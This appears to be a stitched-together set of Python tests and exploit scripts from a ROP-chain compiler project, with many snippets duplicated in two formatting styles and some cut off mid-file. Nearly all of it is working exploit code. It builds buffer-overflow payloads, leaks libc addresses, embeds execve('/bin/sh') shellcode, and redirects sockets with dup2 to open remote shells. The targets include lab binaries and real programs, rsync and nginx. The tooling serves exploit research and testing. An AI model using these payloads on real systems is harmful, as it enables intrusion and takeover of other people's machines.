def test_leak_overflowx86(self): filename = e('leak_overflow') libc, libc_gadgets = e('libc.so'), e('libc.gadgets') os.environ[ 'LD_PRELOAD'] = libc # Ensure we use the libc that we've pulled gadgets from p = process([filename]) p.writeline("1") p.readuntil("what address would you like to peek at?\n") p.writeline("0x804a010") # leak address of fgets fgets_addr = int(p.readline().split(":")[1].strip(), 16) libc_address = fgets_addr - ELF(libc).symbols['fgets'] goals = [["function", "system", "/bin/sh"]] files = [(filename, None, 0), (libc, libc_gadgets, libc_address)] rop = ropme.rop(files, [libc], goals, arch=archinfo.ArchX86(), log_level=logging.DEBUG) p.writeline("2") p.writeline('A' * 272 + rop) p.writeline("3") self.check_shell(p)
def do_test_bof_read_got(self, filename): p = process([filename,'3000']) files = [(filename, None, 0)] rop = ropme.rop(files, ["/lib/x86_64-linux-gnu/libc.so.6"], [["shellcode_hex", binascii.hexlify(self.shellcode_amd64())]], log_level = logging.DEBUG) payload = 'A'*512 + ('B'*8) + rop p.writeline(payload) p.readline() self.check_shell(p)
def test_bof_read_got_x86(self): filename = e('bof_read_got_x86') p = process([filename,'3000']) files = [(filename, None, 0)] rop = ropme.rop(files, ["/lib/i386-linux-gnu/libc.so.6"], [["shellcode_hex", binascii.hexlify(self.shellcode_x86())]], arch = archinfo.ArchX86(), log_level = logging.DEBUG) payload = 'A'*512 + ('B'*16) + rop p.writeline(payload) p.readline() self.check_shell(p)
def test_bof_shell(self): filename = e('bof_shell') files = [(filename, None, 0)] rop = ropme.rop(files, [], [["shellcode_hex", binascii.hexlify(self.shellcode_amd64())]], log_level = logging.DEBUG) payload = 'A'*512 + 'B'*8 + rop p = process([filename,'3000']) p.writeline(payload) p.readline() self.check_shell(p)
def do_test_bof_read_got(self, filename): p = process([filename, '3000']) files = [(filename, None, 0)] rop = ropme.rop( files, ["/lib/x86_64-linux-gnu/libc.so.6"], [["shellcode_hex", binascii.hexlify(self.shellcode_amd64())]], log_level=logging.DEBUG) payload = 'A' * 512 + ('B' * 8) + rop p.writeline(payload) p.readline() self.check_shell(p)
def test_gets(self): bad_bytes = '\n' filename = e('gets') p = process([filename]) files = [(filename, None, 0)] goals = [ ["function", "system", "/bin/sh"] ] rop = ropme.rop(files, [], goals, log_level = logging.DEBUG, bad_bytes = bad_bytes) self.assertFalse(self.contains_bad_bytes(rop, bad_bytes), "Bad bytes found in ROP payload for {} exploit".format(filename)) payload = 'A'*512 + ('B'*8) + rop p.writeline(payload) p.readline() self.check_shell(p)
def test_strcpy(self): bad_bytes = '\0' filename = e('strcpy') p = process([filename]) files = [(filename, None, 0)] goals = [["shellcode_hex", binascii.hexlify(self.shellcode_x86())]] rop = ropme.rop(files, [], goals, log_level = logging.DEBUG, bad_bytes = bad_bytes) self.assertFalse(self.contains_bad_bytes(rop, bad_bytes), "Bad bytes found in ROP payload for {} exploit".format(filename)) payload = 'A'*512 + ('B'*8) + rop p.writeline(payload) p.readline() self.check_shell(p)
def test_bof_shell(self): filename = e('bof_shell') files = [(filename, None, 0)] rop = ropme.rop( files, [], [["shellcode_hex", binascii.hexlify(self.shellcode_amd64())]], log_level=logging.DEBUG) payload = 'A' * 512 + 'B' * 8 + rop p = process([filename, '3000']) p.writeline(payload) p.readline() self.check_shell(p)
def test_bof_read_got_x86(self): filename = e('bof_read_got_x86') p = process([filename, '3000']) files = [(filename, None, 0)] rop = ropme.rop( files, ["/lib/i386-linux-gnu/libc.so.6"], [["shellcode_hex", binascii.hexlify(self.shellcode_x86())]], arch=archinfo.ArchX86(), log_level=logging.DEBUG) payload = 'A' * 512 + ('B' * 16) + rop p.writeline(payload) p.readline() self.check_shell(p)
def bof_many_args(self, is_64bit): if is_64bit: filename, arch = e('bof_many_args'), archinfo.ArchAMD64() else: filename, arch = e('bof_many_args_x86'), archinfo.ArchX86() files = [(filename, None, 0)] rop = ropme.rop(files, [], [["function", "callme", 11,12,13,14,15,16,17,18]], arch = arch, log_level = logging.DEBUG) if is_64bit: payload = 'A'*512 + 'B'*8 + rop else: payload = 'A'*524 + 'B'*4 + rop p = process([filename,'3000']) p.writeline(payload) self.assertEqual('Called with (11,12,13,14,15,16,17,18)', p.readline().strip()) p.close()
def test_bof_system(self): filename = e('bof_system2') files = [(filename, None, 0)] rop = ropme.rop(files, [], [["function", "system", "uname -a\x00"], ["function", "exit", 33]], log_level = logging.DEBUG) payload = 'A'*512 + 'B'*8 + rop p = process([filename,'3000']) p.writeline(payload) actual = p.readline().strip() p.close() uname = process(['uname','-a']) expected = uname.readline().strip() uname.close() self.assertEqual(expected, actual)
def test_bof_execve(self): filename = e('bof_execve') bof_execve = process([filename, '3000']) # start the program p = remote('localhost', 2222) files = [(filename, None, 0)] goals = [["function", "dup2", 4, 0], ["function", "dup2", 4, 1], ["function", "dup2", 4, 2], ["execve", "/bin/sh"]] rop = ropme.rop(files, [], goals, log_level=logging.DEBUG) payload = 'A' * 512 + 'B' * 8 + rop payload += ((700 - len(payload)) * 'B') payload += "JEFF" # To end our input p.write(payload) p.read(8) self.check_shell(p) bof_execve.close()
def test_bof_system(self): filename = e('bof_system2') files = [(filename, None, 0)] rop = ropme.rop( files, [], [["function", "system", "uname -a\x00"], ["function", "exit", 33]], log_level=logging.DEBUG) payload = 'A' * 512 + 'B' * 8 + rop p = process([filename, '3000']) p.writeline(payload) actual = p.readline().strip() p.close() uname = process(['uname', '-a']) expected = uname.readline().strip() uname.close() self.assertEqual(expected, actual)
def test_gets(self): bad_bytes = '\n' filename = e('gets') p = process([filename]) files = [(filename, None, 0)] goals = [["function", "system", "/bin/sh"]] rop = ropme.rop(files, [], goals, log_level=logging.DEBUG, bad_bytes=bad_bytes) self.assertFalse( self.contains_bad_bytes(rop, bad_bytes), "Bad bytes found in ROP payload for {} exploit".format(filename)) payload = 'A' * 512 + ('B' * 8) + rop p.writeline(payload) p.readline() self.check_shell(p)
def test_strcpy(self): bad_bytes = '\0' filename = e('strcpy') p = process([filename]) files = [(filename, None, 0)] goals = [["shellcode_hex", binascii.hexlify(self.shellcode_x86())]] rop = ropme.rop(files, [], goals, log_level=logging.DEBUG, bad_bytes=bad_bytes) self.assertFalse( self.contains_bad_bytes(rop, bad_bytes), "Bad bytes found in ROP payload for {} exploit".format(filename)) payload = 'A' * 512 + ('B' * 8) + rop p.writeline(payload) p.readline() self.check_shell(p)
def bof_many_args(self, is_64bit): if is_64bit: filename, arch = e('bof_many_args'), archinfo.ArchAMD64() else: filename, arch = e('bof_many_args_x86'), archinfo.ArchX86() files = [(filename, None, 0)] rop = ropme.rop( files, [], [["function", "callme", 11, 12, 13, 14, 15, 16, 17, 18]], arch=arch, log_level=logging.DEBUG) if is_64bit: payload = 'A' * 512 + 'B' * 8 + rop else: payload = 'A' * 524 + 'B' * 4 + rop p = process([filename, '3000']) p.writeline(payload) self.assertEqual('Called with (11,12,13,14,15,16,17,18)', p.readline().strip()) p.close()
def test_leak_overflowx86(self): filename = e('leak_overflow') libc, libc_gadgets = e('libc.so'), e('libc.gadgets') os.environ['LD_PRELOAD'] = libc # Ensure we use the libc that we've pulled gadgets from p = process([filename]) p.writeline("1") p.readuntil("what address would you like to peek at?\n") p.writeline("0x804a010") # leak address of fgets fgets_addr = int(p.readline().split(":")[1].strip(), 16) libc_address = fgets_addr - ELF(libc).symbols['fgets'] goals = [ ["function", "system", "/bin/sh"] ] files = [(filename, None, 0), (libc, libc_gadgets, libc_address)] rop = ropme.rop(files, [libc], goals, arch = archinfo.ArchX86(), log_level = logging.DEBUG) p.writeline("2") p.writeline('A'*272 + rop) p.writeline("3") self.check_shell(p)
def test_bof_execve(self): filename = e('bof_execve') bof_execve = process([filename,'3000']) # start the program p = remote('localhost', 2222) files = [(filename, None, 0)] goals = [ ["function", "dup2", 4, 0], ["function", "dup2", 4, 1], ["function", "dup2", 4, 2], ["execve", "/bin/sh"] ] rop = ropme.rop(files, [], goals, log_level = logging.DEBUG) payload = 'A'*512 + 'B'*8 + rop payload += ((700 - len(payload)) * 'B') payload += "JEFF" # To end our input p.write(payload) p.read(8) self.check_shell(p) bof_execve.close()
import sys, logging import archinfo from pwn import * from rop_compiler import ropme filename = './arm_bof_execve' p = remote('localhost', 2222) print "Using automatically built ROP chain" files = [(filename, None, 0)] goals = [ ["function", "dup2", 4, 0], ["function", "dup2", 4, 1], ["function", "dup2", 4, 2], ["execve", "/bin/sh"] ] rop = ropme.rop(files, [], goals, archinfo.ArchARM(), log_level = logging.DEBUG) payload = 'A'*512 + 'B'*4 + rop payload += ((700 - len(payload)) * 'B') payload += "JEFF" # To end our input with open("/tmp/rop", "w") as f: f.write(rop) with open("/tmp/payload", "w") as f: f.write(payload) p.writeline(payload) p.interactive()
import sys, logging from pwn import * from rop_compiler import ropme, goal filename = './bof_system2' print "Using automatically built ROP chain" files = [(filename, None, 0)] rop = ropme.rop(files, [], [["function", "system", "uname -a\x00"], ["function", "exit", 33]], log_level = logging.DEBUG) payload = 'A'*512 + 'B'*8 + rop with open("/tmp/rop", "w") as f: f.write(rop) with open("/tmp/payload", "w") as f: f.write(payload) print 'Calling system("uname -a") in the target' p = process([filename,'3000']) #gdb.attach(p, "set disassembly-flavor intel\nbreak *0x400742\nbreak *system\nbreak *exit") p.writeline(payload) print "\n%s\n" % p.readline()
from rop_compiler import ropme filename = './leak_overflow' libc = 'libc.so' p = process([filename]) gdb.attach(p, "set disassembly-flavor intel\nbreak *main+133") p.writeline("1") p.readuntil("what address would you like to peek at?\n") p.writeline("0x804a010") # leak address of fgets fgets_addr = int(p.readline().split(":")[1].strip(), 16) libc_address = fgets_addr - ELF(libc).symbols['fgets'] goals = [["function", "system", "/bin/sh"]] files = [(filename, None, 0), (libc, 'libc.gadgets', libc_address)] rop = ropme.rop(files, [libc], goals, arch=archinfo.ArchX86(), log_level=logging.DEBUG) payload = 'A' * 272 + rop with open("/tmp/rop", "w") as f: f.write(rop) with open("/tmp/payload", "w") as f: f.write(payload) p.writeline("2") p.writeline(payload) p.writeline("3") p.interactive()
filename = './rsync' files = [(filename, './rsync.gadgets', 0)] shellcode = ( # http://shell-storm.org/shellcode/files/shellcode-603.php "\x48\x31\xd2" # xor %rdx, %rdx + "\x48\x31\xc0" # xor %rax, %rax + "\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68" # mov $0x68732f6e69622f2f, %rbx + "\x48\xc1\xeb\x08" # shr $0x8, %rbx + "\x53" # push %rbx + "\x48\x89\xe7" # mov %rsp, %rdi + "\x50" # push %rax + "\x57" # push %rdi + "\x48\x89\xe6" # mov %rsp, %rsi + "\xb0\x3b" # mov $0x3b, %al + "\x0f\x05" # syscall ) print "Finding gadgets and generating rop chain" goals = [["shellcode_hex", binascii.hexlify(shellcode)]] rop = ropme.rop(files, ["/lib/x86_64-linux-gnu/libc.so.6"], goals, archinfo.ArchAMD64(), logging.DEBUG) payload = ("A" * 5696) + "J"*8 + rop with open("/tmp/rop", "w") as f: f.write(rop) with open("/tmp/payload", "w") as f: f.write(payload) print "Starting rsync with the exploit payload" p = process(argv = [filename, '-r', '--exclude-from=/tmp/payload', '.', '/tmp/to/'], executable = filename) #gdb.attach(p, "set disassembly-flavor intel\nbreak *mprotect\n") p.interactive()
import sys, logging from pwn import * import archinfo from rop_compiler import ropme, goal is_64bit = not (len(sys.argv) > 1 and sys.argv[1].lower() == "x86") if is_64bit: filename, arch = './bof_many_args', archinfo.ArchAMD64() else: filename, arch = './bof_many_args_x86', archinfo.ArchX86() files = [(filename, None, 0)] rop = ropme.rop(files, [], [["function", "callme", 11,12,13,14,15,16,17,18]], arch = arch, log_level = logging.DEBUG) if is_64bit: payload = 'A'*512 + 'B'*8 + rop else: payload = 'A'*524 + 'B'*4 + rop with open("/tmp/rop", "w") as f: f.write(rop) with open("/tmp/payload", "w") as f: f.write(payload) p = process([filename,'3000']) if "debug" in sys.argv: if is_64bit: gdb.attach(p, "set disassembly-flavor intel\nbreak *0x400731\nbreak callme\n") # 64-bit else: gdb.attach(p, "set disassembly-flavor intel\nbreak *0x080485ec\nbreak callme\n") # 32-bit
+ "\x48\x31\xc0" # xor %rax, %rax + "\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68" # mov $0x68732f6e69622f2f, %rbx + "\x48\xc1\xeb\x08" # shr $0x8, %rbx + "\x53" # push %rbx + "\x48\x89\xe7" # mov %rsp, %rdi + "\x50" # push %rax + "\x57" # push %rdi + "\x48\x89\xe6" # mov %rsp, %rsi + "\xb0\x3b" # mov $0x3b, %al + "\x0f\x05" # syscall ) print "Finding gadgets and generating rop chain" goals = [["shellcode_hex", binascii.hexlify(shellcode)]] rop = ropme.rop(files, ["/lib/x86_64-linux-gnu/libc.so.6"], goals, archinfo.ArchAMD64(), logging.DEBUG) payload = ("A" * 5696) + "J" * 8 + rop with open("/tmp/rop", "w") as f: f.write(rop) with open("/tmp/payload", "w") as f: f.write(payload) print "Starting rsync with the exploit payload" p = process( argv=[filename, '-r', '--exclude-from=/tmp/payload', '.', '/tmp/to/'], executable=filename) #gdb.attach(p, "set disassembly-flavor intel\nbreak *mprotect\n") p.interactive()
finder.FILTER_FUNC = filter_gadgets filename = './bof_shell' p = process([filename,'3000']) #gdb.attach(p, "set disassembly-flavor intel\nbreak *0x40064f\nbreak *mprotect\nbreak *0x4006da") shellcode = ( # http://shell-storm.org/shellcode/files/shellcode-603.php "\x48\x31\xd2" # xor %rdx, %rdx + "\x48\x31\xc0" # xor %rax, %rax + "\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68" # mov $0x68732f6e69622f2f, %rbx + "\x48\xc1\xeb\x08" # shr $0x8, %rbx + "\x53" # push %rbx + "\x48\x89\xe7" # mov %rsp, %rdi + "\x50" # push %rax + "\x57" # push %rdi + "\x48\x89\xe6" # mov %rsp, %rsi + "\xb0\x3b" # mov $0x3b, %al + "\x0f\x05" # syscall ) files = [(filename, None, 0)] rop = ropme.rop(files, [], [["shellcode_hex", binascii.hexlify(shellcode)]], log_level = logging.DEBUG) payload = 'A'*512 + 'B'*8 + rop with open("/tmp/rop", "w") as f: f.write(rop) with open("/tmp/payload", "w") as f: f.write(payload) p.writeline(payload) p.interactive()
filename = './bof_execve' process([filename,'3000']) p = remote('localhost', 2222) #p = process([filename,'3000']) #gdb.attach(p, "set disassembly-flavor intel") print "Using automatically built ROP chain" files = [(filename, None, 0)] goals = [ ["function", "dup2", 4, 0], ["function", "dup2", 4, 1], ["function", "dup2", 4, 2], ["execve", "/bin/sh"] ] rop = ropme.rop(files, [], goals, log_level = logging.DEBUG) payload = 'A'*512 + 'B'*8 + rop payload += ((700 - len(payload)) * 'B') payload += "JEFF" # To end our input with open("/tmp/rop", "w") as f: f.write(rop) with open("/tmp/payload", "w") as f: f.write(payload) print 'Calling dup2 and execve in the target' p.write(payload) p.interactive()
import sys, logging, struct from pwn import * from rop_compiler import ropme, goal, gadget files = [('./nginx', './nginx.gadgets', 0)] # Use stored gadgets file for quicker generation goals = [ ["function", "dup2", 7, 0], # socket fd 7 = client socket ["function", "dup2", 7, 1], # socket fd 7 = client socket ["function", "dup2", 7, 2], # socket fd 7 = client socket ["execve", "/bin/sh"] ] rop = ropme.rop(files, [], goals, log_level = logging.DEBUG, strategy = gadget.FIRST) # The exploit causes the 3rd overwritten qword to get corrupted, skip past it skip_24_bytes_gadget = struct.pack("Q", 0x4035b2) payload = "\x00" + (1063 * "A") + skip_24_bytes_gadget + ("B" * 8) + ("C" * 8) payload += rop # Setup a server to listen for nginx's connection server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) server.bind(("0.0.0.0", 12345)) server.listen(1) client, address = server.accept() # Once it connects, send it our payload r = remote.fromsocket(client) r.write(payload) r.close()
if len(sys.argv) > 1: filename, arch = './bof_read_got2', archinfo.ArchAMD64() p = process([filename,'3000']) #gdb.attach(p, "set disassembly-flavor intel\nbreak *mprotect\nbreak *0x400677") shellcode = ( # http://shell-storm.org/shellcode/files/shellcode-603.php "\x48\x31\xd2" # xor %rdx, %rdx + "\x48\x31\xc0" # xor %rax, %rax + "\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68" # mov $0x68732f6e69622f2f, %rbx + "\x48\xc1\xeb\x08" # shr $0x8, %rbx + "\x53" # push %rbx + "\x48\x89\xe7" # mov %rsp, %rdi + "\x50" # push %rax + "\x57" # push %rdi + "\x48\x89\xe6" # mov %rsp, %rsi + "\xb0\x3b" # mov $0x3b, %al + "\x0f\x05" # syscall ) files = [(filename, None, 0)] libs = ["/lib/x86_64-linux-gnu/libc.so.6"] rop = ropme.rop(files, libs, [["shellcode_hex", binascii.hexlify(shellcode)]], arch = arch, log_level = logging.DEBUG) payload = 'A'*512 + 'B'*8 + rop with open("/tmp/rop", "w") as f: f.write(rop) with open("/tmp/payload", "w") as f: f.write(payload) p.writeline(payload) p.interactive()
import sys, logging from pwn import * from rop_compiler import ropme, goal filename = './bof_system' p = process([filename, '3000']) #gdb.attach(p, "set disassembly-flavor intel\nbreak *0x40067f\nbreak *system\nbreak *exit") print "Using automatically built ROP chain" files = [(filename, None, 0)] uname_a_address = 0x400810 # address of the string "uname -a" rop = ropme.rop( files, [], [["function", "system", uname_a_address], ["function", "exit", 33]], log_level=logging.DEBUG) payload = 'A' * 512 + 'B' * 8 + rop with open("/tmp/rop", "w") as f: f.write(rop) with open("/tmp/payload", "w") as f: f.write(payload) print 'Calling system("uname -a") in the target' p.readline() p.writeline(payload) print "\n%s\n" % p.readline()
import sys, logging, binascii, os import archinfo from pwn import * from rop_compiler import ropme filename = './strcpy' libc, libc_gadgets = "libc.so", "libc.gadgets" # Make sure we get the right libc env = dict(os.environ) env["LD_PRELOAD"] = env['PWD'] + "/" + libc elf = ELF(libc) p = process([filename], env = env) gdb.attach(p, "set disassembly-flavor intel\nbreak *0x0804865d\n") libc_address = int(p.readline().split(":")[1].strip(), 16) - elf.symbols["puts"] files = [(filename, None, 0), (libc, libc_gadgets, libc_address)] libraries = [libc] rop = ropme.rop(files, libraries, [["execve", "/bin/sh"]], arch = archinfo.ArchX86(), log_level = logging.DEBUG, bad_bytes = "\x00") payload = 'A'*512 + 'B'*20 + rop with open("/tmp/rop", "w") as f: f.write(rop) with open("/tmp/payload", "w") as f: f.write(payload) p.writeline(payload) p.interactive()
import sys, logging from pwn import * from rop_compiler import ropme, goal filename = './bof_execve' process([filename, '3000']) p = remote('localhost', 2222) #p = process([filename,'3000']) #gdb.attach(p, "set disassembly-flavor intel") print "Using automatically built ROP chain" files = [(filename, None, 0)] goals = [["function", "dup2", 4, 0], ["function", "dup2", 4, 1], ["function", "dup2", 4, 2], ["execve", "/bin/sh"]] rop = ropme.rop(files, [], goals, log_level=logging.DEBUG) payload = 'A' * 512 + 'B' * 8 + rop payload += ((700 - len(payload)) * 'B') payload += "JEFF" # To end our input with open("/tmp/rop", "w") as f: f.write(rop) with open("/tmp/payload", "w") as f: f.write(payload) print 'Calling dup2 and execve in the target' p.write(payload) p.interactive()
import sys, logging from pwn import * from rop_compiler import ropme, goal filename = './bof_system' p = process([filename,'3000']) #gdb.attach(p, "set disassembly-flavor intel\nbreak *0x40067f\nbreak *system\nbreak *exit") print "Using automatically built ROP chain" files = [(filename, None, 0)] uname_a_address = 0x400810 # address of the string "uname -a" rop = ropme.rop(files, [], [["function", "system", uname_a_address], ["function", "exit", 33]], log_level = logging.DEBUG) payload = 'A'*512 + 'B'*8 + rop with open("/tmp/rop", "w") as f: f.write(rop) with open("/tmp/payload", "w") as f: f.write(payload) print 'Calling system("uname -a") in the target' p.readline() p.writeline(payload) print "\n%s\n" % p.readline()
shellcode = ( # http://shell-storm.org/shellcode/files/shellcode-603.php "\x48\x31\xd2" # xor %rdx, %rdx + "\x48\x31\xc0" # xor %rax, %rax + "\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68" # mov $0x68732f6e69622f2f, %rbx + "\x48\xc1\xeb\x08" # shr $0x8, %rbx + "\x53" # push %rbx + "\x48\x89\xe7" # mov %rsp, %rdi + "\x50" # push %rax + "\x57" # push %rdi + "\x48\x89\xe6" # mov %rsp, %rsi + "\xb0\x3b" # mov $0x3b, %al + "\x0f\x05" # syscall ) ropchain = ropme.rop( [files], [], [["shellcode_hex", binascii.hexlify(shellcode)]], log_level=logging.DEBUG) #ropchain = open("b28_rop4", "r").read() ###################################################################################### # Calculate the values to ensure the free call doesn't crash ######################### ###################################################################################### # Variables: # value = we write in two dwords # value_lower = lower dword of value # value_higher = upper dword of value # ptr = free pointer we write in our overflow # :binop: = add, subtract, divide, multiply # result = the result of value_lower :binop: value_higher
import sys, logging import archinfo from pwn import * from rop_compiler import ropme filename = './arm_bof_execve' p = remote('localhost', 2222) print "Using automatically built ROP chain" files = [(filename, None, 0)] goals = [["function", "dup2", 4, 0], ["function", "dup2", 4, 1], ["function", "dup2", 4, 2], ["execve", "/bin/sh"]] rop = ropme.rop(files, [], goals, archinfo.ArchARM(), log_level=logging.DEBUG) payload = 'A' * 512 + 'B' * 4 + rop payload += ((700 - len(payload)) * 'B') payload += "JEFF" # To end our input with open("/tmp/rop", "w") as f: f.write(rop) with open("/tmp/payload", "w") as f: f.write(payload) p.writeline(payload) p.interactive()
filename = './strcpy' libc, libc_gadgets = "libc.so", "libc.gadgets" # Make sure we get the right libc env = dict(os.environ) env["LD_PRELOAD"] = env['PWD'] + "/" + libc elf = ELF(libc) p = process([filename], env=env) gdb.attach(p, "set disassembly-flavor intel\nbreak *0x0804865d\n") libc_address = int(p.readline().split(":")[1].strip(), 16) - elf.symbols["puts"] files = [(filename, None, 0), (libc, libc_gadgets, libc_address)] libraries = [libc] rop = ropme.rop(files, libraries, [["execve", "/bin/sh"]], arch=archinfo.ArchX86(), log_level=logging.DEBUG, bad_bytes="\x00") payload = 'A' * 512 + 'B' * 20 + rop with open("/tmp/rop", "w") as f: f.write(rop) with open("/tmp/payload", "w") as f: f.write(payload) p.writeline(payload) p.interactive()
import binascii from pwn import * from rop_compiler import ropme shellcode = ( # http://shell-storm.org/shellcode/files/shellcode-603.php "\x48\x31\xd2" # xor %rdx, %rdx + "\x48\x31\xc0" # xor %rax, %rax + "\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68" # mov $0x68732f6e69622f2f, %rbx + "\x48\xc1\xeb\x08" # shr $0x8, %rbx + "\x53" # push %rbx + "\x48\x89\xe7" # mov %rsp, %rdi + "\x50" # push %rax + "\x57" # push %rdi + "\x48\x89\xe6" # mov %rsp, %rsi + "\xb0\x3b" # mov $0x3b, %al + "\x0f\x05" # syscall ) filename = './rsync' files = [(filename, './rsync.gadgets', 0)] goals = [["shellcode_hex", binascii.hexlify(shellcode)]] rop = ropme.rop(files, ["/lib/x86_64-linux-gnu/libc.so.6"], goals) payload = ("A" * 5696) + "J"*8 + rop with open("/tmp/payload", "w") as f: f.write(payload) p = process(argv = [filename, '-r', '--exclude-from=/tmp/payload', '.', '/tmp/to/'], executable = filename) p.interactive()
import sys, logging, binascii import archinfo from pwn import * from rop_compiler import ropme filename = './leak_overflow' libc = 'libc.so' p = process([filename]) gdb.attach(p, "set disassembly-flavor intel\nbreak *main+133") p.writeline("1") p.readuntil("what address would you like to peek at?\n") p.writeline("0x804a010") # leak address of fgets fgets_addr = int(p.readline().split(":")[1].strip(), 16) libc_address = fgets_addr - ELF(libc).symbols['fgets'] goals = [ ["function", "system", "/bin/sh"] ] files = [(filename, None, 0), (libc, 'libc.gadgets', libc_address)] rop = ropme.rop(files, [libc], goals, arch = archinfo.ArchX86(), log_level = logging.DEBUG) payload = 'A'*272 + rop with open("/tmp/rop", "w") as f: f.write(rop) with open("/tmp/payload", "w") as f: f.write(payload) p.writeline("2") p.writeline(payload) p.writeline("3") p.interactive()